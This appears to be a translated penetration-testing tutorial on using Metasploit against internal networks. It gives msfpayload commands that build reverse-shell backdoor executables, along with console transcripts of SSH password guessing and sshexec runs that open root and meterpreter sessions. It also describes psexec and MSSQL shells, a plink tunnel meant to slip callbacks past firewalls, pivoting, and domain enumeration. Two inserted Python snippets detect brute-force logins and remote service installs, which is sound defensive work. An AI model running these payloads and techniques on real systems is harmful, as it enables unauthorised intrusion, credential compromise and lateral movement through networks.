Metasploit penetration test notes (intranet penetration)
0x01 Reverse shell file
Generally, msfpayload is used to generate a backdoor .exe file, which is uploaded to the target machine and executed; the meterpreter shell then connects back to a local listener.
reverse_tcp/http/https => exe => victim => shell
reverse_tcp
Windows:
msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe
Linux (x86)
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell
reverse_http
msfpayload windows/meterpreter/reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe
reverse_https
msfpayload windows/meterpreter/reverse_https LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe
Login permissions
Ways to obtain a meterpreter shell after obtaining some login permissions.
SSH
ssh_login
Module path: auxiliary/scanner/ssh/ssh_login
msf exploit(sshexec) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true             no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS
set PASSWORD   set PASS_FILE
msf auxiliary(ssh_login) > set PASSWORD toor
PASSWORD => toor
msf auxiliary(ssh_login) > exploit

[*] 192.168.1.104:22 SSH - Starting bruteforce
[*] 192.168.1.104:22 SSH - [1/3] - Trying: username: 'root' with password: ''
[-] 192.168.1.104:22 SSH - [1/3] - Failed: 'root':''
[*] 192.168.1.104:22 SSH - [2/3] - Trying: username: 'root' with password: 'root'
[-] 192.168.1.104:22 SSH - [2/3] - Failed: 'root':'root'
[*] 192.168.1.104:22 SSH - [3/3] - Trying: username: 'root' with password: 'toor'
[*] Command shell session 4 opened (192.168.1.105:54562 -> 192.168.1.104:22) at 2014-08-07 22:55:54 +0800
[+] 192.168.1.104:22 SSH - [3/3] - Success: 'root':'toor' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-164.el5 #1 SMP Thu Sep 3 03:33:56 EDT 2009 i686 i686 i386 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions

Active sessions
===============

  Id  Type         Information                        Connection
  --  ----         -----------                        ----------
  4   shell linux  SSH root:toor (192.168.1.104:22)   192.168.1.105:54562 -> 192.168.1.104:22 (192.168.1.104)

msf auxiliary(ssh_login) >
Metasploit returns a plain Linux shell when it finds a weak SSH password. Note that this is not a meterpreter shell. You can use
sessions -u <id>
to upgrade the Linux shell to a meterpreter shell. The local test fails. :(
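From the defender's side, the ssh_login run above leaves a recognisable trace in the server's auth log: a burst of failed password attempts from one source, followed by a success from the same source. The following Python is an added example, not code from the original notes; the sshd log lines are constructed (the OpenSSH "Failed password" / "Accepted password" message format is real), and the threshold of two failures within ten minutes is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines (not from the original post) modelling the
# ssh_login run above: two failures on root, then a success, same source,
# plus an unrelated key-based login that must not be flagged.
SAMPLE_LOG = """\
Aug  7 22:55:52 localhost sshd[2301]: Failed password for root from 192.168.1.105 port 54560 ssh2
Aug  7 22:55:53 localhost sshd[2303]: Failed password for root from 192.168.1.105 port 54561 ssh2
Aug  7 22:55:54 localhost sshd[2305]: Accepted password for root from 192.168.1.105 port 54562 ssh2
Aug  7 23:10:01 localhost sshd[2400]: Accepted publickey for alice from 10.0.0.7 port 41000 ssh2
"""

# OpenSSH authentication result lines; "invalid user" appears for unknown names.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+) port \d+"
)

def parse(log_text, year=2014):
    """Yield (timestamp, result, user, src) for each sshd auth line.
    Syslog lines carry no year, so the caller supplies it."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["result"], m["user"], m["src"]

def find_guessed_logins(log_text, min_failures=2, window_s=600):
    """Return (src, user, failure_count) for every successful login that was
    preceded by at least min_failures failed attempts from the same source
    within window_s seconds. Thresholds are assumptions; tune to your logs."""
    failures = defaultdict(list)   # src -> timestamps of failed attempts
    hits = []
    for ts, result, user, src in parse(log_text):
        if result == "Failed":
            failures[src].append(ts)
            continue
        recent = [t for t in failures[src] if (ts - t).total_seconds() <= window_s]
        if len(recent) >= min_failures:
            hits.append((src, user, len(recent)))
    return hits

if __name__ == "__main__":
    for src, user, n in find_guessed_logins(SAMPLE_LOG):
        print(f"likely guessed password: {user} from {src} after {n} failures")
```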
sshexec
Module path: exploit/multi/ssh/sshexec
Note that this module does not exist in BT5 or Kali.
msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(sshexec) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(sshexec) > set LPORT 8080
LPORT => 8080
msf exploit(sshexec) > set RHOST 192.168.1.104
RHOST => 192.168.1.104
msf exploit(sshexec) > set PASSWORD toor
PASSWORD => toor
msf exploit(sshexec) > exploit

[*] Started reverse handler on 192.168.1.105:8080
[*] 192.168.1.104:22 - Sending Bourne stager...
[*] Command Stager progress - 40.39% done (288/713 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 192.168.1.104
[*] Command Stager progress - 100.00% done (713/713 bytes)
[*] Meterpreter session 3 opened (192.168.1.105:8080 -> 192.168.1.104:40813) at 2014-08-07 22:53:12 +0800

meterpreter >
SMB
Module path: exploit/windows/smb/psexec
If smb_login finds a weak Windows password, you can use this module to obtain a shell. This is the most basic way to obtain a Windows shell on an intranet. When logging on to a domain machine you must set the domain option; otherwise the logon fails.
As mentioned earlier, show advanced lists the advanced options of each module; for this module you can set the EXE options in the advanced settings to execute an arbitrary local file (see [1]).
What if the target machine runs antivirus software or other simple protection? Then you can try executing only a command instead of dropping a file.
psexec_command
Module path: auxiliary/admin/smb/psexec_command
Token cannot be used :(
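A defender's check for the psexec and psexec_command paths above: both install a temporary service on the target over SMB, which the Service Control Manager records as event 7045 ("a service was installed in the system"). This Python is an added example, not code from the original notes; the event records are constructed, and the heuristics (an eight-letter random service name, an image path that runs cmd.exe or powershell or a freshly dropped binary under %SYSTEMROOT%) are assumptions about the default module behaviour, so treat matches as leads, not verdicts.

```python
import re

# Constructed System-log records (not from the original post), flattened to
# dicts the way a SIEM would present Service Control Manager event 7045.
EVENTS = [
    {"EventID": 7045, "ServiceName": "XkqYpLmR",
     "ImagePath": r"%SYSTEMROOT%\XkqYpLmR.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "TzLbWqEy",
     "ImagePath": r"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e <base64 placeholder>",
     "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe", "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "XkqYpLmR", "ImagePath": "", "AccountName": ""},
]

# Assumption: the module names its service with 8 random letters.
RANDOM_NAME = re.compile(r"^[A-Za-z]{8}$")
# Assumption: the service runs a shell one-liner, or a just-dropped binary
# with the same random-letter name in the system root (ADMIN$ share).
SUSPICIOUS_PATH = re.compile(
    r"%COMSPEC%|cmd\.exe|powershell|%SYSTEMROOT%\\[A-Za-z]{8}\.exe", re.IGNORECASE)

def classify(event):
    """Return the reasons a 7045 record looks like a remote service drop
    (empty list for other event IDs or benign-looking installs)."""
    if event.get("EventID") != 7045:
        return []
    reasons = []
    if RANDOM_NAME.match(event.get("ServiceName", "")):
        reasons.append("random-looking service name")
    if SUSPICIOUS_PATH.search(event.get("ImagePath", "")):
        reasons.append("image path runs a shell or a freshly dropped binary")
    return reasons

def suspicious_services(events):
    """Return (service name, reasons) for every record classify() flags."""
    flagged = []
    for e in events:
        reasons = classify(e)
        if reasons:
            flagged.append((e["ServiceName"], reasons))
    return flagged

if __name__ == "__main__":
    for name, reasons in suspicious_services(EVENTS):
        print(f"7045 service {name}: {'; '.join(reasons)}")
```

Correlating the 7045 record with the matching SMB logon (event 4624, logon type 3) from the same source host is the natural next step, and the service is usually gone again seconds later, so the install event is often the only durable artefact.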
SQL Server
msf exploit(psexec) > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > show options

Module options (exploit/windows/mssql/mssql_payload):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)
   PASSWORD                              no        The password for the specified username
   RHOST                                 yes       The target address
   RPORT                1433             yes       The target port
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(mssql_payload) >
After obtaining SQL Server login credentials, you can quickly obtain a meterpreter shell.
In this module all three delivery methods rely on xp_cmdshell: ps uses powershell, cmd uses wscript.exe, and old uses debug.com. There is no local environment for it, so no demo is shown.
Others
No matter what the scenario is, you only need to turn whatever access you have into file upload plus execution to get a shell. When you obtain some permission, first google whether an applicable script already exists; if not, analyze whether that permission can be converted into file operations and execution. If it can, you can get the shell. For example:
mysql, sqlserver, etc. => file write / webshell => shell
The msf plug-in tunna was also tested locally, with the php version. The code roughly does the following:
First generate a meterpreter.exe (the file name is fixed, not random),
then upload the file to c:\windows\temp\meterpreter.exe,
then call the exec function in php. During the test the LHOST parameter was wrong when the meterpreter.exe code was generated; after the rb code was changed, the shell finally came back, though still with an error.
0x02 Pivoting with metasploit
After obtaining certain permissions on a pivot host, how can we make full use of it as a pivot? This section briefly introduces several common methods.
Add a route
This is the most common method in metasploit. After binding a route to a session, you can use msf modules to scan or attack across network segments. There are several ways to do this: the autoroute script can quickly add the route (for example), or you can put the current session in the background (background) and then add it with the route command.
Socks4a proxy
Here we use the auxiliary/server/socks4a module. Note that proxychains does not support ICMP, so nmap must be run with the -sT -Pn options when going through the proxy. In addition, proxychains' connection messages are very noisy; running sqlmap through the proxychains shipped with Kali looks really messy. You can use proxychains-ng instead: uninstall proxychains in Kali, then install proxychains-ng.
root@kali:~# git clone https://github.com/rofl0r/proxychains-ng.git
Cloning into 'proxychains-ng'...
remote: Counting objects: 842, done.
remote: Total 842 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (842/842), 465.92 KiB | 27 KiB/s, done.
Resolving deltas: 100% (554/554), done.
root@kali:~# cd proxychains-ng/
root@kali:~/proxychains-ng# ./configure --prefix=/usr --sysconfdir=/etc
Done, now run make && make install
root@kali:~/proxychains-ng# make && make install
Then run programs with the proxychains4 -q option and there will be no noisy output.
SSH
metassh
When you have SSH login credentials, you can use this plug-in to establish a link based on the SSH session (see [2]).
Then drop into the shell, check the IP address of the NIC, exit, and add the route.
Scan the 5.5.5.0/24 segment, then scan the host 5.5.5.134 for weak passwords.
The results come back through the SSH session.
SSH / plink.exe
Another way of using SSH is to tunnel the callback through plink on Windows, so that the packets are encrypted by SSH and the firewall only sees an SSH connection. The same works on Linux. First, generate a reverse backdoor that calls back to localhost:
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=5566 X > ~/Desktop/backdoor_reverse_localhost.exe
Start the listener, then upload plink and backdoor.exe through the webshell. Then execute
echo y | plink.exe -L 5566:192.168.6.131:6666 192.168.6.131 -l root -pw toor
After running backdoor.exe, the meterpreter session is established through the SSH tunnel.
0x03 Intranet Scanning
Metasploit has scanners for common services (smb/ssh/mysql/mssql/oracle/ftp/tftp/... etc.) that collect version information (banners), verify logins, and so on.
For a simple workflow, refer to the previous note (msf intranet penetration notes).
The scan modules live under /usr/share/metasploit-framework/modules/auxiliary/; look up the path you need there.
Common scan ports: 109,110,111,123,135,137,138,139,143,161,264,265,389,443,445,500,631,901,995,124,
You can also use an rc script (basic_discovery.rc).
In addition, SNMP is useful for gathering information on an intranet. If a switch has a weak SNMP community string, you can use SNMP to collect its routing table and VLAN division.
Generally, the network administrator annotates the VLAN division, for example Vlan100 is department x and Vlan200 is department y. The OIDs needed to obtain this information differ between switch brands and models (most of them differ), and SNMP runs on UDP port 161, so when ssh, telnet, web or the services above are not enabled on the switch and the port cannot be forwarded, you can adapt the snmp_enumusers.rb script once you know the specific OID value.
0x04 Domain penetration problems
Several scanning scripts for AD are recommended (see [3], the same below).
psexec_loggedin_users
This script can find the user logged on to each IP address in the current segment.
local_admin_search_enum
Finds the IP addresses and user names where the current logon account is a local administrator.
psexec_scanner
Runs psexec in batch to get shells. The script wraps psexec in a batch function, which is a good example to study when writing your own; for details refer to [4].
For more metasploit scripts for windows Domain penetration, refer to [5].
0x05 Postscript
Metasploit is not essential for intranet and domain penetration; it is mostly used together with other tools. The overall process (see [6]) matters more than understanding AD in isolation. Metasploit only provides a tunnel and automates discovery and exploitation. Simply understanding ruby and the metasploit code framework is a powerful aid both for learning and for penetration testing. The examples above are only a reference for the reader when building a script for a particular situation.
0x06 References
[1] http://opexxx.tumblr.com/post/35763770674/btb-security-how-to-make-custom-exes-for-deployment
[2] https://github.com/dirtyfilthy/metassh
[3] http://www.pentestgeek.com/2012/11/03/find-local-admin-with-metasploit/
[4] http://www.darkoperator.com/blog/2011/12/16/psexec-scanner-auxiliary-module.html
[5] https://github.com/darkoperator/Meterpreter-Scripts/tree/master/post/windows/gather
[6] http://www.freebuf.com/articles/web/5901.html (and the reply by Gall in comment #8)